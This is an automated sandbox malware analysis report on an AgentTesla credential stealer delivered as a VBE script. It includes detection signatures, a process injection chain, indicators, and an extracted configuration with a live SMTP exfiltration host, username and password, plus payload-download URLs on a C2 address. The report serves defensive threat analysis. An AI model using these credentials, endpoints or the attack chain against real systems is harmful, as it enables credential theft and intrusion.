Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
009.vbe

Overview

General Information

Sample name:009.vbe
Analysis ID:1592175
MD5:9ff77002fbcbdd6e749722541b423034
SHA1:ea5ff219e2dde3cc57a1668ff0526be5b84e1250
SHA256:5b3b169b48056c1cd8b84093c312de2f9ec1c7a1edcd7591743f6eac62c98ab9
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5844 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6004 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • wermgr.exe (PID: 5532 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6004" "2764" "2772" "2788" "0" "0" "2828" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.3346351856.00000000026E4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.3346351856.00000000026DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.3346351856.00000000026B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.MSBuild.exe.340000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.MSBuild.exe.340000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  5.2.MSBuild.exe.340000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_6004.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=

                  Sigma Signatures

                  Networking

                  barindex
                  Sigma detected: MSBuild connects to smtp port
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 380, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49709

                  System Summary

                  barindex
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5548, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 172.67.74.152, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 380, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", ProcessId: 5548, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper - File
                  Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5548, TargetFilename: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5548, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe", ProcessId: 5548, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5844, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 6004, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T21:29:15.100589+010020301711A Network Trojan was detected192.168.2.549709162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T21:27:36.637872+010028555421A Network Trojan was detected192.168.2.549709162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T21:27:36.637872+010028552451A Network Trojan was detected192.168.2.549709162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T21:29:15.100589+010028400321A Network Trojan was detected192.168.2.549709162.254.34.31587TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 5.2.MSBuild.exe.340000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
                  Multi AV Scanner detection for submitted file
                  Source: 009.vbeVirustotal: Detection: 44%Perma Link
                  Source: 009.vbeReversingLabs: Detection: 21%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49707 version: TLS 1.2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49709 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49709 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49709 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49709 -> 162.254.34.31:587
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:49709 -> 162.254.34.31:587
                  Source: Joe Sandbox ViewIP Address: 144.91.79.54 144.91.79.54
                  Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                  Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                  Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                  Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                  Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.5:49709 -> 162.254.34.31:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2412/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2412/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/cn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2412/dl2xgIbUbOo3ZqLShxJX.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: wscript.exe, 00000000.00000003.2110848703.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110681597.0000019303A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.5
                  Source: wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106079195.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110848703.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2105671132.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106027765.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110681597.0000019303A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
                  Source: wscript.exe, 00000000.00000003.2115256128.0000019305741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/cn
                  Source: wscript.exe, 00000000.00000003.2121136354.00000193059D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txt
                  Source: wscript.exe, 00000000.00000003.2123186894.000001930574F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115049431.00000193059D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121950926.000001930574B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125683822.0000019305750000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115256128.0000019305741000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/file
                  Source: wscript.exe, 00000000.00000003.2123186894.000001930574F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2121950926.000001930574B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125683822.0000019305750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/r
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/r8O
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/rd
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/rdN
                  Source: wscript.exe, 00000000.00000003.2110457845.0000019303A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/rs
                  Source: wscript.exe, 00000000.00000003.2106191750.000001930574B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/s
                  Source: wscript.exe, 00000000.00000003.2105634223.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2105710801.0000019303A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/s8O
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2412/v
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/e4
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/e4P
                  Source: wscript.exe, 00000000.00000003.2106265181.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2106079195.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110848703.0000019303A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110681597.0000019303A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/ll
                  Source: wscript.exe, 00000000.00000003.2122620326.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123769033.0000019303A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123079339.0000019303A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122279561.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125377044.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txt
                  Source: wscript.exe, 00000000.00000003.2122620326.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123769033.0000019303A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2123079339.0000019303A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2122279561.0000019303A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2125377044.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/file
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/r
                  Source: wscript.exe, 00000000.00000003.2110586290.0000019303A87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2110457845.0000019303A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2412/v
                  Source: MSBuild.exe, 00000005.00000002.3346351856.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: MSBuild.exe, 00000005.00000002.3344601128.0000000000342000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3346351856.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: MSBuild.exe, 00000005.00000002.3346351856.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: MSBuild.exe, 00000005.00000002.3346351856.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
